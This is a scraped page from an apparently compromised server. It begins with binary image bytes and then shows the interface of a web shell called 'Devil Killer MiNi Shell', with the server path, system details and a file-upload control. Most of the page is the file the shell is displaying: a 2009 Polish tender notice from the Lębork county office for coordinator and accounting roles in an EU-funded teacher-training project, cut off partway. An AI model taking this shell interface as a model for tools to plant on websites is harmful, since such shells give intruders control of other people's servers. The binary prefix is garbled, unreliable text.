JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/8448-N-2009.html

<p class="kh_header"><b>Lębork: PEŁNIENIE FUNKCJI KOORDYNATORA, ASYSTENTA KOORDYNATORA ORAZ PROWADZENIE OBSŁUGI  KSIĘGOWEJ W RAMACH PROJEKTU PODNOSZENIE KWALIFIKACJI NAUCZYCIELI W POWIECIE LĘBORSKIM WSPÓŁFINANSOWANEGO PRZEZ  UNIĘ EUROPEJSKĄ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO</b><br>
<b>Numer ogłoszenia: 8448 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.leborski.samorzady.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI KOORDYNATORA, ASYSTENTA KOORDYNATORA ORAZ PROWADZENIE OBSŁUGI  KSIĘGOWEJ W RAMACH PROJEKTU PODNOSZENIE KWALIFIKACJI NAUCZYCIELI W POWIECIE LĘBORSKIM WSPÓŁFINANSOWANEGO PRZEZ  UNIĘ EUROPEJSKĄ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
-pełnienie funkcji koordynatora projektu;
-pełnienie funkcji asystenta koordynatora; 
-prowadzenie obsługi księgowej - 2 osoby
w zakresie projektu Podnoszenie kwalifikacji nauczycieli w powiecie lęborskim 
numer WND-POKL.09.04.00-22-014/08 w ramach Programu Operacyjnego Kapitał Ludzki, Działania 9.4 Wysoko wykwalifikowane kadry oświaty współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.  

CZĘŚĆ A
Przedmiotem zamówienia jest pełnienie funkcji koordynatora projektu, do którego obowiązków będzie należało:

1)	Przejęcie odpowiedzialności za całość realizacji projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach.
2)	Terminowe i właściwe realizowanie całości projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach i współpraca z Asystentem koordynatora.
3)	 Koordynowanie działań projektowych. 
4)	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem 
5)	Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i Unii Europejskiej.  
6)	Nadzorowanie bieżących postępów w realizacji projektu.
7)	Nadzór nad całością prac związanych z realizacją projektu i ich jakością.
8)	Zarządzanie planowanymi działaniami projektowymi.
9)	Prowadzenie Biura Projektu.
10)	Koordynacja prac zespołu projektowego i podejmowanie decyzji.
11)	Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego, w tym delegowanie odpowiedzialności. 
12)	Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu.
13)	Koordynacja działań merytorycznych i logistycznych związanych z projektem.
14)	Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
15)	Rzetelne i terminowe sporządzanie w oparciu o informacje dostarczone przez Lidera 
i Partnera Projektu wniosków o płatność wraz z zebraniem wszystkich załączników, w tym sporządzanie ostatniego wniosku o płatność.
16)	Rzetelne i terminowe sporządzanie raportów miesięcznych z przebiegu realizacji projektu dla Lidera i Partnera projektu. 
17)	Przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych. 
18)	Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej.
19)	Przekazywanie Zleceniodawcy sprawozdań miesięcznych z przebiegu wykonywania przedmiotu umowy.
20)	Planowanie działań i wywiązywanie się ze wskaźników.
21)	Kierowanie bieżącymi sprawami związanymi z realizacją projektu.
22)	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne 
w zakresie realizacji projektu.
23)	Obecność podczas kontroli projektu.
24)	Współpraca z wykładowcami/trenerami w zakresie przygotowania szczegółowego programu szkoleń.
25)	Nadzorowanie przebiegu szkoleń.
26)	Dbanie o jakość materiałów dydaktycznych.
27)	Opracowanie szczegółowego harmonogramu zajęć.
28)	Zaprojektowanie ankiet ewaluacyjnych dla potrzeb ewaluacji zgodnie z wytycznymi 
29)	 w projekcie.
30)	Monitoring i ewaluacja projektu oraz jego promocja.
31)	Kontrola wydatkowania środków.
32)	Dokonywanie innych czynności zastrzeżonych do kompetencji Koordynatora.

CZĘŚĆ B
Przedmiotem zamówienia jest pełnienie funkcji asystenta koordynatora do którego obowiązków będzie należało:
1)	Bieżąca realizacja zadań wynikających z projektu i współpraca z Koordynatorem projektu.
2)	Wykonywanie czynności administracyjnych związanych z realizacją projektu.
3)	Organizacja szkoleń kursów studiów wynikających z wniosku i harmonogramu projektu.
4)	Współpraca z wykładowcami w zakresie przygotowania szczegółowego programu szkoleń, w tym nadzór nad prawidłową realizacją szkoleń.
5)	Informowanie potencjalnych uczestników projektu o ofercie szkoleń kursów finansowanych ze środków EFS i warunkach udziału w poszczególnych szkoleniach kursach.
6)	Wykonywanie zadań składających się na proces rekrutacji grupy docelowej (formularz zgłoszenia, ankieta wstępna).
7)	Kontakt z prowadzącymi szkolenia kursy.  
8)	Monitorowanie uczestnictwa Beneficjentów.
9)	Organizacja i koordynacja promocji projektu.
10)	Nadzór nad prowadzeniem strony internetowej dotyczącej projektu (dbałość o aktualne dane).
11)	Prowadzenie bieżącej dokumentacji projektu w oparciu o obowiązujące zapisy.
12)	Zapewnienie terminowej realizacji zadań wynikających z harmonogramu realizacji projektu.
13)	Dokonywanie systematycznej kontroli uzyskanych efektów.
14)	Prowadzenie bieżącej statystyki projektu (archiwum).
15)	Tworzenie bazy uczestników projektu.
16)	Przygotowanie i wydruk zaświadczeń o uczestnictwie w ramach projektu.
17)	Sporządzanie sprawozdań z realizacji projektu we współpracy z Koordynatorem projektu w zakresie realizacji szkoleń/kursów zaplanowanych w projekcie.
18)	Promocja projektu w mediach (prasa, radio) oraz poprzez plakaty, ulotki, broszurę informacyjną w szkołach i innych instytucjach współpracujących na terenie powiatu lęborskiego.
19)	Kontakt z partnerami w zakresie działań promocyjno - informacyjnych.
20)	Prowadzenie archiwum.  

CZĘŚĆ C
Przedmiotem zamówienia jest prowadzenie obsługi księgowej projektu - 2 osoby, do obowiązków których będzie należało: 
1)	Wspieranie działań Koordynatora projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektów.
2)	Sporządzenie sprawozdań okresowych.
3)	Prowadzenie dokumentacji księgowej projektu zgodnie z obowiązującymi przepisami finansowymi, w tym opisywanie faktur.
4)	Współpraca w zakresie księgowania i realizacji płatności projektu z Wydziałem Finansowo- Budżetowym Starostwa Powiatowego w Lęborku i Urzędu Miejskiego 
w Lęborku.
5)	Współpraca w zakresie księgowości z Instytucją Pośredniczącą i Zarządzającą.
6)	Współpraca w zakresie księgowości z partnerem projektu.
7)	Kontrola poprawności formalnej księgowych i finansowych dokumentów projektu.
8)	Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie 
z wytycznymi.
9)	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu).
10)	Dokonywanie kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu 
i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi.
11)	Comiesięczna kontrola zgodności bilansu finansowanego projektu, wykonana w oparciu 
o zapisy księgowe.         
12)	Przygotowanie we współpracy z Koordynatorem projektu harmonogramu płatności wg zasad określonych w dokumentach programowych.
13)	Prawidłowe oznaczenie i opisanie dokumentów księgowych przetwarzanych przy realizacji projektu.
14)	Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu. 
15)	Przygotowanie raportów o finansowym postępie w realizacji projektu. 
16)	Zapobieganie powstawaniu nieprawidłowości finansowych i raportowanie ich wystąpienia. 
17)	Rejestracja faktur i rachunków wpływających.
18)	Weryfikacja faktur pod względem formalno-rachunkowym i prawidłowości rozliczeń finansowych uwzględniających wszystkie źródła finansowania. 
19)	Nadzór nad płatnościami dla wykonawców. 
20)	Przestrzeganie procedur i instrukcji związanych z realizacją projektu.
21)	Ścisła współpraca z Głównym Księgowym Zamawiającego w zakresie księgowości projektu. 
22)	Rozliczenie finansowe z partnerem projektu.
23)	Współpraca z Koordynatorem Projektu i Asystentem Koordynatora w celu zapewnienia prawidłowego przepływu informacji.
24)	Współpraca z organami kontrolującymi.
25)	Przekazywanie dokumentacji rozliczeniowej do partnera projektu. 
Osoba zaproponowana do realizacji zamówienia może pełnić tylko jedną funkcję 
w ramach przedmiotu zamówienia.

2.	Wykonywanie zleconych zadań odbywać się będzie w siedzibie Zamawiającego przez czas trwanie umowy, tj. od momentu podpisania umowy do 15.11.2010 r. we wszystkie dni 
z wyłączeniem dni ustawowo wolnych od pracy, również w godzinach popołudniowych. 
W przypadku kolizji świadczeń, świadczenie na rzecz Zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. 
Wykonawcy przyjmujący obowiązki związane z prowadzeniem Projektu będą zatrudnieni przez Zamawiającego na podstawie umowy zlecenia. 
Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia.
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców podczas wykonywania przedmiotu zamówienia.   
                                          
3. Dane dotyczące projektu Podnoszenie kwalifikacji nauczycieli w powiecie lęborskim współfinansowanego ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa  
w ramach programu POKL działanie 9.4
- Miejsca realizacji: Powiat Lęborski. 
- Biuro Projektu: Starostwo Powiatowe w Lęborku, ul. Czołgistów 5.  
- Termin realizacji projektu: od 15.01.2009 roku do 15.11.2010 roku,
- Wartość  projektu - 524 584,00 zł.
- Liczba nauczycieli objętych projektem - 125 osób.
- Ilość godzin planowanych szkoleń: 
- Tematyka projektu:
   1) kurs: skuteczne motywowanie - (10 osób) 15 godzin,
   2) kurs: umiejętności kluczowe niezbędne do nauczania w szkole - (10 osób) 45 godzin,
   3) kurs: wykorzystanie nowoczesnych technik multimedialnych wraz z formami aktywizującymi   - (10 osób) 40 godzin,
   4) szkolenia językowe - (30 osób - 3 grupy)  łącznie 630 godzin,
   5) szkolenia komputerowe - (30 osób - 3 grupy) łącznie 300 godzin,
   6) kurs doskonalący - doradca zawodowy - (20 osób - 2 grupy) łącznie 80 godzin,
   7) studia podyplomowe - (15 osób) 3 semestry, min. 350 godzin..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.21.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki określone w art. 22 
ust. 1 ustawy Prawo zamówień publicznych oraz spełniający warunki i wymagania określone 
w niniejszej Specyfikacji Istotnych Warunków Zamówienia, a w szczególności spełniają poniższe warunki:
- są uprawnieni do występowania w obrocie prawnym zgodnie z wymogami ustawowymi,
- zapewnią realizację zamówienia przez osobę posiadającą następujące kwalifikacje 
i umiejętności:

CZĘŚĆ A
a) wykształcenie wyższe,
b) doświadczenie we wdrażaniu minimum jednego projektu finansowanego ze środków Unii Europejskiej lub ukończenie szkolenia z zakresu kierowania projektami współfinansowanymi ze  środków Unii Europejskiej,  
c) doświadczenie zawodowe w pracy w administracji publicznej na stanowisku urzędniczym (min. 3 lata),
d) znajomość zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
e) znajomość przepisów ustawy Prawo zamówień publicznych oraz ustawy o finansach publicznych, 
f) podstawowa umiejętność obsługi komputera (w tym programów Word, Excel, PowerPoint), 
g) znajomość przepisów ustawy Karta Nauczyciela, 
h) posiadanie zdolności organizacyjnych, 
i) posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
j) nie była karana za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.

CZĘŚĆ B
a) wykształcenie co najmniej średnie,
b) posiadanie doświadczenia we wdrażaniu minimum jednego projektu finansowanego ze środków Unii Europejskiej lub ukończenie szkolenia z zakresu kierowania projektami współfinansowanymi ze  środków Unii Europejskiej,  
c) znajomość zasad i procedur realizacji projektów współfinansowanych przez Europejski Fundusz Społeczny, potwierdzona oświadczeniem,
d) znajomość przepisów ustawy prawo zamówień publicznych oraz ustawy o finansach publicznych, potwierdzona oświadczeniem,
e) podstawowa umiejętność obsługi komputera (w tym programów Word, Excel, PowerPoint), potwierdzona oświadczeniem,
f) posiadanie zdolności organizacyjnych,
g) pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych,
h) nie była karana za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.

CZĘŚĆ C
a)	wykształcenie co najmniej średnie,
b)	znajomość przepisów ustawy o finansach publicznych,
c)	znajomość zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, potwierdzona oświadczeniem. 
d)	doświadczenie zawodowe - minimum roczny staż pracy w jednostkach samorządu terytorialnego,
e)	podstawowa umiejętność obsługi komputera (w tym programów Word, Excel, program księgowo - finansowy), potwierdzona oświadczeniem,
f)	posiadanie zdolności organizacyjnych,
g)	pełna zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych,
h)	nie była karana za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.

Ocena spełnienia warunków udziału ma charakter eliminacyjny. Do udziału w postępowaniu dopuszczeni zostaną wykonawcy, którzy spełnią wszystkie warunki w postępowaniu. 
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia, nie spełnia na podstawie oświadczenia wraz z ofertą i dokumentami wymienionymi poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy składają następujące dokumenty i załączniki:
1.	Formularz oferty - wypełniony i podpisany przez Wykonawcę - załącznik nr 1 do SIWZ,
2.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ,
3.	Kwestionariusz osobowy wraz z oświadczeniem - załącznik nr 3 do SIWZ,
4.	Kserokopie dyplomów, świadectw potwierdzających wykształcenie i kwalifikacje         kandydata oraz zaświadczenia o ukończonych kursach i szkoleniach, poświadczone za zgodność z oryginałem przez Wykonawcę,
5.	Dokument  poświadczający okres pracy w jednostkach samorządu terytorialnego - wymagany dla każdej funkcji,
6.	Dokument (oświadczenie Wykonawcy i kserokopia zaświadczeń potwierdzających ukończenie szkolenia) potwierdzający znajomość zasad i procedur realizacji projektów współfinansowanych przez Europejski Fundusz Społeczny.
7.	Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
8.	Oświadczenie o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków PO KL i generatora wniosków o płatność. 
9.	Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadanie pełnej zdolności do czynności prawnych oraz korzystania 
z pełni praw publicznych.
10.	Dokument potwierdzający doświadczenie zawodowe pracy w administracji publicznej na stanowisko urzędniczym.
11.	Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
12.	Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych oraz ustawy o finansach publicznych.
13.	Oświadczenie o umiejętność obsługi komputera (w tym programów Word, Excel, PowerPoint).
14.	Oświadczenie o znajomości przepisów ustawy Karta Nauczyciela..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - doświadczenie i wykształcenie zawodowe - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lęborku, ul. Czołgistów 5, 84 - 300 Lębork , pok nr. 217.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Lęborku, ul. Czołgistów 5, 84 - 300 Lębork, Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Podnoszenie kwalifikacji nauczycieli w powiecie lęborskim współfinansowany ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa  
w ramach programu POKL działanie 9.4.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ A.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji koordynatora projektu, do którego obowiązków będzie należało:

1)	Przejęcie odpowiedzialności za całość realizacji projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach.
2)	Terminowe i właściwe realizowanie całości projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach i współpraca z Asystentem koordynatora.
3)	 Koordynowanie działań projektowych. 
4)	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem 
5)	Kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i Unii Europejskiej.  
6)	Nadzorowanie bieżących postępów w realizacji projektu.
7)	Nadzór nad całością prac związanych z realizacją projektu i ich jakością.
8)	Zarządzanie planowanymi działaniami projektowymi.
9)	Prowadzenie Biura Projektu.
10)	Koordynacja prac zespołu projektowego i podejmowanie decyzji.
11)	Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego, w tym delegowanie odpowiedzialności. 
12)	Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu.
13)	Koordynacja działań merytorycznych i logistycznych związanych z projektem.
14)	Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
15)	Rzetelne i terminowe sporządzanie w oparciu o informacje dostarczone przez Lidera 
i Partnera Projektu wniosków o płatność wraz z zebraniem wszystkich załączników, w tym sporządzanie ostatniego wniosku o płatność.
16)	Rzetelne i terminowe sporządzanie raportów miesięcznych z przebiegu realizacji projektu dla Lidera i Partnera projektu. 
17)	Przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych. 
18)	Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej.
19)	Przekazywanie Zleceniodawcy sprawozdań miesięcznych z przebiegu wykonywania przedmiotu umowy.
20)	Planowanie działań i wywiązywanie się ze wskaźników.
21)	Kierowanie bieżącymi sprawami związanymi z realizacją projektu.
22)	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne 
w zakresie realizacji projektu.
23)	Obecność podczas kontroli projektu.
24)	Współpraca z wykładowcami/trenerami w zakresie przygotowania szczegółowego programu szkoleń.
25)	Nadzorowanie przebiegu szkoleń.
26)	Dbanie o jakość materiałów dydaktycznych.
27)	Opracowanie szczegółowego harmonogramu zajęć.
28)	Zaprojektowanie ankiet ewaluacyjnych dla potrzeb ewaluacji zgodnie z wytycznymi 
29)	 w projekcie.
30)	Monitoring i ewaluacja projektu oraz jego promocja.
31)	Kontrola wydatkowania środków.
32)	Dokonywanie innych czynności zastrzeżonych do kompetencji Koordynatora..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie i wykształcenie zawodowe - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ B.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji asystenta koordynatora do którego obowiązków będzie należało:
